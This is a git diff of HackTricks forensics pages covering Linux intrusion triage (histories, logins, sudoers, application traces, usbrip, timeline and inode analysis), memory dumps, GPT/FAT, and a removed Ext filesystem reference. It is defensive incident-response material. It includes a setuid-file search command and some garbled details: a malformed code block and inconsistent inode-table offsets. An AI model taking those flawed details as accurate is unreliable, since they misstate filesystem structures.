unexpected logs here. {% hint style="info" %} Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. Because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering. {% endhint %} -### Command History +**Linux maintains a command history for each user**, stored in: -Many Linux systems are configured to maintain a command history for each user account: +- ~/.bash_history +- ~/.zsh_history +- ~/.zsh_sessions/* +- ~/.python_history +- ~/.*_history -* \~/.bash\_history -* \~/.history -* \~/.sh\_history -* \~/.\*\_history +Moreover, the `last -Faiwx` command provides a list of user logins. Check it for unknown or unexpected logins. -### Logins +Check files that can grant extra rprivileges: -Using the command `last -Faiwx` it's possible to get the list of users that have logged in.\ -It is recommended to check if those logins make sense: +- Review `/etc/sudoers` for unanticipated user privileges that may have been granted. +- Review `/etc/sudoers.d/` for unanticipated user privileges that may have been granted. +- Examine `/etc/groups` to identify any unusual group memberships or permissions. +- Examine `/etc/passwd` to identify any unusual group memberships or permissions. -* Any unknown user? -* Any user that shouldn't have a shell logged in? +Some apps alse generates its own logs: -This is important as **attackers** some times may copy `/bin/bash` inside `/bin/false` so users like **lightdm** may be **able to login**. - -Note that you can also **take a look at this information by reading the logs**. - -### Application Traces - -* **SSH**: Connections to systems made using SSH to and from a compromised system result in entries being made in files for each user account (_**∼/.ssh/authorized\_keys**_ and _**∼/.ssh/known\_keys**_). These entries can reveal the hostname or IP address of the remote hosts. -* **Gnome Desktop**: User accounts may have a _**∼/.recently-used.xbel**_ file that contains information about files that were recently accessed using applications running on the Gnome desktop. -* **VIM**: User accounts may have a _**∼/.viminfo**_ file that contains details about the use of VIM, including search string history and paths to files that were opened using vim. -* **Open Office**: Recent files. -* **MySQL**: User accounts may have a _**∼/.mysql\_history**_ file that contains queries executed using MySQL. -* **Less**: User accounts may have a _**∼/.lesshst**_ file that contains details about the use of less, including search string history and shell commands executed via less. +- **SSH**: Examine _~/.ssh/authorized_keys_ and _~/.ssh/known_hosts_ for unauthorized remote connections. +- **Gnome Desktop**: Look into _~/.recently-used.xbel_ for recently accessed files via Gnome applications. +- **Firefox/Chrome**: Check browser history and downloads in _~/.mozilla/firefox_ or _~/.config/google-chrome_ for suspicious activities. +- **VIM**: Review _~/.viminfo_ for usage details, such as accessed file paths and search history. +- **Open Office**: Check for recent document access that may indicate compromised files. +- **FTP/SFTP**: Review logs in _~/.ftp_history_ or _~/.sftp_history_ for file transfers that might be unauthorized. +- **MySQL**: Investigate _~/.mysql_history_ for executed MySQL queries, potentially revealing unauthorized database activities. +- **Less**: Analyze _~/.lesshst_ for usage history, including viewed files and commands executed. +- **Git**: Examine _~/.gitconfig_ and project _.git/logs_ for changes to repositories. ### USB Logs @@ -350,14 +343,14 @@ It is interesting to **know all the USBs that have been used** and it will be mo ### Installation -``` +```bash pip3 install usbrip usbrip ids download #Download USB ID database ``` ### Examples -``` +```bash usbrip events history #Get USB history of your curent linux machine usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user #Search for vid and/or pid @@ -367,6 +360,8 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) + +
\ @@ -375,6 +370,8 @@ Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} + + ## Review User Accounts and Logon Activities Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and or used in close proximity to known unauthorized events. Also, check possible sudo brute-force attacks.\ @@ -383,22 +380,30 @@ Finally, look for accounts with **no passwords** or **easily guessed** passwords ## Examine File System -File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of **malware**.\ -**Malware** is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with timeline analysis. Other malicious codes are designed to only store certain information in memory to minimize the amount of data stored in the file system.\ -To deal with such anti-forensic techniques, it is necessary to pay **careful attention to timeline analysis** of file system date-time stamps and to files stored in common locations where malware might be found. +### Analyzing File System Structures in Malware Investigation -* Using **autopsy** you can see the timeline of events that may be useful to discover suspicious activity. You can also use the `mactime` feature from **Sleuth Kit** directly. -* Check for **unexpected scripts** inside **$PATH** (maybe some sh or php scripts?) -* Files in `/dev` used to be special files, you may find non-special files here related to malware. -* Look for unusual or **hidden files** and **directories**, such as β€œ.. ” (dot dot space) or β€œ..^G ” (dot dot control-G) -* Setuid copies of /bin/bash on the system `find / -user root -perm -04000 –print` -* Review date-time stamps of deleted **inodes for large numbers of files being deleted around the same time**, which might indicate malicious activity such as the installation of a rootkit or trojanized service. -* Because inodes are allocated on a next available basis, **malicious files placed on the system at around the same time may be assigned consecutive inodes**. Therefore, after one component of malware is located, it can be productive to inspect neighbouring inodes. -* Also check directories like _/bin_ or _/sbin_ as the **modified and or changed time** of new or modified files may be interesting. -* It's interesting to see the files and folders of a directory **sorted by creation date** instead of alphabetically to see which files or folders are more recent (the last ones usually). +When investigating malware incidents, the structure of the file system is a crucial source of information, revealing both the sequence of events and the malware's content. However, malware authors are developing techniques to hinder this analysis, such as modifying file timestamps or avoiding the file system for data storage. -You can check the most recent files of a folder using `ls -laR --sort=time /bin`\ -You can check the inodes of the files inside a folder using `ls -lai /bin |sort -n` +To counter these anti-forensic methods, it's essential to: + +- **Conduct a thorough timeline analysis** using tools like **Autopsy** for visualizing event timelines or **Sleuth Kit's** `mactime` for detailed timeline data. +- **Investigate unexpected scripts** in the system's $PATH, which might include shell or PHP scripts used by attackers. +- **Examine `/dev` for atypical files**, as it traditionally contains special files, but may house malware-related files. +- **Search for hidden files or directories** with names like ".. " (dot dot space) or "..^G" (dot dot control-G), which could conceal malicious content. +- **Identify setuid root files** using the command: + ```find / -user root -perm -04000 -print``` + This finds files with elevated permissions, which could be abused by attackers. +- **Review deletion timestamps** in inode tables to spot mass file deletions, possibly indicating the presence of rootkits or trojans. +- **Inspect consecutive inodes** for nearby malicious files after identifying one, as they may have been placed together. +- **Check common binary directories** (_/bin_, _/sbin_) for recently modified files, as these could be altered by malware. + +```bash +# List recent files in a directory: +ls -laR --sort=time /bin``` + +# Sort files in a directory by inode: +ls -lai /bin | sort -n``` +``` {% hint style="info" %} Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modified at the **same time** as the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**. @@ -406,38 +411,42 @@ Note that an **attacker** can **modify** the **time** to make **files appear** * ## Compare files of different filesystem versions -#### Find added files +### Filesystem Version Comparison Summary +To compare filesystem versions and pinpoint changes, we use simplified `git diff` commands: + +- **To find new files**, compare two directories: ```bash -git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ +git diff --no-index --diff-filter=A path/to/old_version/ path/to/new_version/ ``` -#### Find Modified content - +- **For modified content**, list changes while ignoring specific lines: ```bash -git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time" +git diff --no-index --diff-filter=M path/to/old_version/ path/to/new_version/ | grep -E "^\+" | grep -v "Installed-Time" ``` -#### Find deleted files - +- **To detect deleted files**: ```bash -git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ +git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/ ``` -#### Other filters - -**`-diff-filter=[(A|C|D|M|R|T|U|X|B)…​[*]]`** - -Select only files that are Added (`A`), Copied (`C`), Deleted (`D`), Modified (`M`), Renamed (`R`), and have their type (i.e. regular file, symlink, submodule, …​) changed (`T`), are Unmerged (`U`), are Unknown (`X`), or have had their pairing Broken (`B`). Any combination of the filter characters (including none) can be used. When `*` (All-or-none) is added to the combination, all paths are selected if there is any file that matches other criteria in the comparison; if there is no file that matches other criteria, nothing is selected. - -Also, **these upper-case letters can be downcased to exclude**. E.g. `--diff-filter=ad` excludes added and deleted paths. - -Note that not all diffs can feature all types. For instance, diffs from the index to the working tree can never have Added entries (because the set of paths included in the diff is limited by what is in the index). Similarly, copied and renamed entries cannot appear if detection for those types is disabled. +- **Filter options** (`--diff-filter`) help narrow down to specific changes like added (`A`), deleted (`D`), or modified (`M`) files. + - `A`: Added files + - `C`: Copied files + - `D`: Deleted files + - `M`: Modified files + - `R`: Renamed files + - `T`: Type changes (e.g., file to symlink) + - `U`: Unmerged files + - `X`: Unknown files + - `B`: Broken files ## References * [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf) * [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/) +* [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203) +* **Book: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides**
@@ -447,7 +456,7 @@ Do you work in a **cybersecurity company**? Do you want to see your **company ad * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md index 1ce3f44f0..67786fa78 100644 --- a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md +++ b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
@@ -24,8 +24,10 @@ Start **searching** for **malware** inside the pcap. Use the **tools** mentioned ## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md) -The premiere open-source framework for memory dump analysis is [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md). Volatility is a Python script for parsing memory dumps that were gathered with an external tool (or a VMware memory image gathered by pausing the VM). So, given the memory dump file and the relevant "profile" (the OS from which the dump was gathered), Volatility can start identifying the structures in the data: running processes, passwords, etc. It is also extensible using plugins for extracting various types of artifacts.\ -From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) +**Volatility is the main open-source framework for memory dump analysis**. This Python tool analyzes dumps from external sources or VMware VMs, identifying data like processes and passwords based on the dump's OS profile. It's extensible with plugins, making it highly versatile for forensic investigations. + +**[Find here a cheatsheet](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)** + ## Mini dump crash report @@ -64,7 +66,7 @@ You should **open** it using **IDA** or **Radare** to inspection it in **depth** * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md index a5c55a699..e05337c43 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -80,28 +80,33 @@ mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/ ### GPT (GUID Partition Table) -It’s called GUID Partition Table because every partition on your drive has a **globally unique identifier**. +The GUID Partition Table, known as GPT, is favored for its enhanced capabilities compared to MBR (Master Boot Record). Distinctive for its **globally unique identifier** for partitions, GPT stands out in several ways: -Just like MBR it starts in the **sector 0**. The MBR occupies 32bits while **GPT** uses **64bits**.\ -GPT **allows up to 128 partitions** in Windows and up to **9.4ZB**.\ -Also, partitions can have a 36 character Unicode name. +- **Location and Size**: Both GPT and MBR start at **sector 0**. However, GPT operates on **64bits**, contrasting with MBR's 32bits. +- **Partition Limits**: GPT supports up to **128 partitions** on Windows systems and accommodates up to **9.4ZB** of data. +- **Partition Names**: Offers the ability to name partitions with up to 36 Unicode characters. -On an MBR disk, the partitioning and boot data are stored in one place. If this data is overwritten or corrupted, you’re in trouble. In contrast, **GPT stores multiple copies of this data across the disk**, so it’s much more robust and can recover if the data is corrupted. +**Data Resilience and Recovery**: -GPT also stores **cyclic redundancy check (CRC)** values to check that its data is intact. If the data is corrupted, GPT can notice the problem and **attempt to recover the damaged data** from another location on the disk. +- **Redundancy**: Unlike MBR, GPT doesn't confine partitioning and boot data to a single place. It replicates this data across the disk, enhancing data integrity and resilience. +- **Cyclic Redundancy Check (CRC)**: GPT employs CRC to ensure data integrity. It actively monitors for data corruption, and when detected, GPT attempts to recover the corrupted data from another disk location. -**Protective MBR (LBA0)** +**Protective MBR (LBA0)**: -For limited backward compatibility, the space of the legacy MBR is still reserved in the GPT specification, but it is now used in a **way that prevents MBR-based disk utilities from misrecognizing and possibly overwriting GPT disks**. This is referred to as a protective MBR. +- GPT maintains backward compatibility through a protective MBR. This feature resides in the legacy MBR space but is designed to prevent older MBR-based utilities from mistakenly overwriting GPT disks, hence safeguarding the data integrity on GPT-formatted disks. -![](<../../../.gitbook/assets/image (491).png>) +![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID_Partition_Table_Scheme.svg/800px-GUID_Partition_Table_Scheme.svg.png](<../../../.gitbook/assets/image (491).png>) **Hybrid MBR (LBA 0 + GPT)** +[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table) + In operating systems that support **GPT-based boot through BIOS** services rather than EFI, the first sector may also still be used to store the first stage of the **bootloader** code, but **modified** to recognize **GPT** **partitions**. The bootloader in the MBR must not assume a sector size of 512 bytes. **Partition table header (LBA 1)** +[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table) + The partition table header defines the usable blocks on the disk. It also defines the number and size of the partition entries that make up the partition table (offsets 80 and 84 in the table). | Offset | Length | Contents | @@ -160,42 +165,28 @@ If it was a **GPT table instead of an MBR** it should appear the signature _EFI ### FAT -The **FAT (File Allocation Table)** file system is named for its method of organization, the file allocation table, which resides at the beginning of the volume. To protect the volume, **two copies** of the table are kept, in case one becomes damaged. In addition, the file allocation tables and the root folder must be stored in a **fixed location** so that the files needed to start the system can be correctly located. +The **FAT (File Allocation Table)** file system is designed around its core component, the file allocation table, positioned at the volume's start. This system safeguards data by maintaining **two copies** of the table, ensuring data integrity even if one is corrupted. The table, along with the root folder, must be in a **fixed location**, crucial for the system's startup process. -![](<../../../.gitbook/assets/image (495).png>) +The file system's basic unit of storage is a **cluster, usually 512B**, comprising multiple sectors. FAT has evolved through versions: -The minimum space unit used by this file system is a **cluster, typically 512B** (which is composed of a number of sectors). +- **FAT12**, supporting 12-bit cluster addresses and handling up to 4078 clusters (4084 with UNIX). +- **FAT16**, enhancing to 16-bit addresses, thereby accommodating up to 65,517 clusters. +- **FAT32**, further advancing with 32-bit addresses, allowing an impressive 268,435,456 clusters per volume. -The earlier **FAT12** had a **cluster addresses to 12-bit** values with up to **4078** **clusters**; it allowed up to 4084 clusters with UNIX. The more efficient **FAT16** increased to **16-bit** cluster address allowing up to **65,517 clusters** per volume. FAT32 uses 32-bit cluster address allowing up to **268,435,456 clusters** per volume +A significant limitation across FAT versions is the **4GB maximum file size**, imposed by the 32-bit field used for file size storage. -The **maximum file size allowed by FAT is 4GB** (minus one byte) because the file system uses a 32-bit field to store the file size in bytes, and 2^32 bytes = 4 GiB. This happens for FAT12, FAT16 and FAT32. +Key components of the root directory, particularly for FAT12 and FAT16, include: -The **root directory** occupies a **specific position** for both FAT12 and FAT16 (in FAT32 it occupies a position like any other folder). Each file/folder entry contains this information: - -* Name of the file/folder (8 chars max) -* Attributes -* Date of creation -* Date of modification -* Date of last access -* Address of the FAT table where the first cluster of the file starts -* Size - -When a file is "deleted" using a FAT file system, the directory entry remains almost **unchanged** except for the **first character of the file name** (modified to 0xE5), preserving most of the "deleted" file's name, along with its time stamp, file length and β€” most importantly β€” its physical location on the disk. The list of disk clusters occupied by the file will, however, be erased from the File Allocation Table, marking those sectors available for use by other files created or modified thereafter. In the case of FAT32, it is additionally an erased field responsible for the upper 16 bits of the file start cluster value. - -### **NTFS** - -{% content-ref url="ntfs.md" %} -[ntfs.md](ntfs.md) -{% endcontent-ref %} +- **File/Folder Name** (up to 8 characters) +- **Attributes** +- **Creation, Modification, and Last Access Dates** +- **FAT Table Address** (indicating the start cluster of the file) +- **File Size** ### EXT **Ext2** is the most common file system for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**. -{% content-ref url="ext.md" %} -[ext.md](ext.md) -{% endcontent-ref %} - ## **Metadata** Some files contain metadata. This information is about the content of the file which sometimes might be interesting to an analyst as depending on the file type, it might have information like: diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md deleted file mode 100644 index 4b8d38ec2..000000000 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md +++ /dev/null @@ -1,252 +0,0 @@ - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- - -# Ext - Extended Filesystem - -**Ext2** is the most common filesystem for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**. - -All block groups in the filesystem have the same size and are stored sequentially. This allows the kernel to easily derive the location of a block group in a disk from its integer index. - -Every block group contains the following pieces of information: - -* A copy of the filesystem’s superblock -* A copy of the block group descriptors -* A data block bitmap which is used to identify the free blocks inside the group -* An inode bitmap, which is used to identify the free inodes inside the group -* inode table: it consists of a series of consecutive blocks, each of which contains a predefined Figure 1 Ext2 inode number of inodes. All inodes have the same size: 128 bytes. A 1,024 byte block contains 8 inodes, while a 4,096-byte block contains 32 inodes. Note that in Ext2, there is no need to store on disk a mapping between an inode number and the corresponding block number because the latter value can be derived from the block group number and the relative position inside the inode table. For example, suppose that each block group contains 4,096 inodes and that we want to know the address on the disk of inode 13,021. In this case, the inode belongs to the third block group and its disk address is stored in the 733rd entry of the corresponding inode table. As you can see, the inode number is just a key used by the Ext2 routines to retrieve the proper inode descriptor on the disk quickly -* data blocks, containing files. Any block which does not contain any meaningful information is said to be free. - -![](<../../../.gitbook/assets/image (406).png>) - -## Ext Optional Features - -**Features affect where** the data is located, **how** the data is stored in inodes and some of them might supply **additional metadata** for analysis, therefore features are important in Ext. - -Ext has optional features that your OS may or may not support, there are 3 possibilities: - -* Compatible -* Incompatible -* Compatible Read Only: It can be mounted but not for writing - -If there are **incompatible** features you won't be able to mount the filesystem as the OS won't know how the access the data. - -{% hint style="info" %} -A suspected attacker might have non-standard extensions -{% endhint %} - -**Any utility** that reads the **superblock** will be able to indicate the **features** of an **Ext filesystem**, but you could also use `file -sL /dev/sd*` - -## Superblock - -The superblock is the first 1024 bytes from the start and it's repeated in the first block of each group and contains: - -* Block size -* Total blocks -* Blocks per block group -* Reserved blocks before the first block group -* Total inodes -* Inodes per block group -* Volume name -* Last write time -* Last mount time -* Path where the file system was last mounted -* Filesystem status (clean?) - -It's possible to obtain this information from an Ext filesystem file using: - -```bash -fsstat -o /pat/to/filesystem-file.ext -#You can get the with the "p" command inside fdisk -``` - -You can also use the free GUI application: [https://www.disk-editor.org/index.html](https://www.disk-editor.org/index.html)\ -Or you can also use **python** to obtain the superblock information: [https://pypi.org/project/superblock/](https://pypi.org/project/superblock/) - -## inodes - -The **inodes** contain the list of **blocks** that **contains** the actual **data** of a **file**.\ -If the file is big, and inode **may contain pointers** to **other inodes** that point to the blocks/more inodes containing the file data. - -![](<../../../.gitbook/assets/image (416).png>) - -In **Ext2** and **Ext3** inodes are of size **128B**, **Ext4** currently uses **156B** but allocates **256B** on disk to allow a future expansion. - -Inode structure: - -| Offset | Size | Name | DescriptionF | -| ------ | ---- | ----------------- | ------------------------------------------------ | -| 0x0 | 2 | File Mode | File mode and type | -| 0x2 | 2 | UID | Lower 16 bits of owner ID | -| 0x4 | 4 | Size Il | Lower 32 bits of file size | -| 0x8 | 4 | Atime | Access time in seconds since epoch | -| 0xC | 4 | Ctime | Change time in seconds since epoch | -| 0x10 | 4 | Mtime | Modify time in seconds since epoch | -| 0x14 | 4 | Dtime | Delete time in seconds since epoch | -| 0x18 | 2 | GID | Lower 16 bits of group ID | -| 0x1A | 2 | Hlink count | Hard link count | -| 0xC | 4 | Blocks Io | Lower 32 bits of block count | -| 0x20 | 4 | Flags | Flags | -| 0x24 | 4 | Union osd1 | Linux: I version | -| 0x28 | 69 | Block\[15] | 15 points to data block | -| 0x64 | 4 | Version | File version for NFS | -| 0x68 | 4 | File ACL low | Lower 32 bits of extended attributes (ACL, etc) | -| 0x6C | 4 | File size hi | Upper 32 bits of file size (ext4 only) | -| 0x70 | 4 | Obsolete fragment | An obsoleted fragment address | -| 0x74 | 12 | Osd 2 | Second operating system dependent union | -| 0x74 | 2 | Blocks hi | Upper 16 bits of block count | -| 0x76 | 2 | File ACL hi | Upper 16 bits of extended attributes (ACL, etc.) | -| 0x78 | 2 | UID hi | Upper 16 bits of owner ID | -| 0x7A | 2 | GID hi | Upper 16 bits of group ID | -| 0x7C | 2 | Checksum Io | Lower 16 bits of inode checksum | - -"Modify" is the timestamp of the last time the file's _content_ has been modified. This is often called "_mtime_".\ -"Change" is the timestamp of the last time the file's _inode_ has been changed, like by changing permissions, ownership, file name, and the number of hard links. It's often called "_ctime_". - -Inode structure extended (Ext4): - -| Offset | Size | Name | Description | -| ------ | ---- | ------------ | ------------------------------------------- | -| 0x80 | 2 | Extra size | How many bytes beyond standard 128 are used | -| 0x82 | 2 | Checksum hi | Upper 16 bits of inode checksum | -| 0x84 | 4 | Ctime extra | Change time extra bits | -| 0x88 | 4 | Mtime extra | Modify time extra bits | -| 0x8C | 4 | Atime extra | Access time extra bits | -| 0x90 | 4 | Crtime | File create time (seconds since epoch) | -| 0x94 | 4 | Crtime extra | File create time extra bits | -| 0x98 | 4 | Version hi | Upper 32 bits of version | -| 0x9C | | Unused | Reserved space for future expansions | - -Special inodes: - -| Inode | Special Purpose | -| ----- | ---------------------------------------------------- | -| 0 | No such inode, numberings starts at 1 | -| 1 | Defective block list | -| 2 | Root directory | -| 3 | User quotas | -| 4 | Group quotas | -| 5 | Boot loader | -| 6 | Undelete directory | -| 7 | Reserved group descriptors (for resizing filesystem) | -| 8 | Journal | -| 9 | Exclude inode (for snapshots) | -| 10 | Replica inode | -| 11 | First non-reserved inode (often lost + found) | - -{% hint style="info" %} -Not that the creation time only appears in Ext4. -{% endhint %} - -By knowing the inode number you can easily find its index: - -* **Block group** where an inode belongs: (Inode number - 1) / (Inodes per group) -* **Index inside it's group**: (Inode number - 1) mod(Inodes/groups) -* **Offset** into **inode table**: Inode number \* (Inode size) -* The "-1" is because the inode 0 is undefined (not used) - -```bash -ls -ali /bin | sort -n #Get all inode numbers and sort by them -stat /bin/ls #Get the inode information of a file -istat -o /path/to/image.ext 657103 #Get information of that inode inside the given ext file -icat -o /path/to/image.ext 657103 #Cat the file -``` - -File Mode - -| Number | Description | -| ------ | --------------------------------------------------------------------------------------------------- | -| **15** | **Reg/Slink-13/Socket-14** | -| **14** | **Directory/Block Bit 13** | -| **13** | **Char Device/Block Bit 14** | -| **12** | **FIFO** | -| 11 | Set UID | -| 10 | Set GID | -| 9 | Sticky Bit (without it, anyone with Write & exec perms on a directory can delete and rename files) | -| 8 | Owner Read | -| 7 | Owner Write | -| 6 | Owner Exec | -| 5 | Group Read | -| 4 | Group Write | -| 3 | Group Exec | -| 2 | Others Read | -| 1 | Others Write | -| 0 | Others Exec | - -The bold bits (12, 13, 14, 15) indicate the type of file the file is (a directory, socket...) only one of the options in bold may exit. - -Directories - -| Offset | Size | Name | Description | -| ------ | ---- | --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | -| 0x0 | 4 | Inode | | -| 0x4 | 2 | Rec len | Record length | -| 0x6 | 1 | Name len | Name length | -| 0x7 | 1 | File type |

0x00 Unknown
0x01 Regular

0x02 Director

0x03 Char device

0x04 Block device

0x05 FIFO

0x06 Socket

0x07 Sym link

| -| 0x8 | | Name | Name string (up to 255 characters) | - -**To increase the performance, Root hash Directory blocks may be used.** - -**Extended Attributes** - -Can be stored in - -* Extra space between inodes (256 - inode size, usually = 100) -* A data block pointed to by file\_acl in inode - -Can be used to store anything as a users attribute if the name starts with "user". So data can be hidden this way. - -Extended Attributes Entries - -| Offset | Size | Name | Description | -| ------ | ---- | ------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | -| 0x0 | 1 | Name len | Length of attribute name | -| 0x1 | 1 | Name index |

0x0 = no prefix

0x1 = user. Prefix

0x2 = system.posix_acl_access

0x3 = system.posix_acl_default

0x4 = trusted.

0x6 = security.

0x7 = system.

0x8 = system.richacl

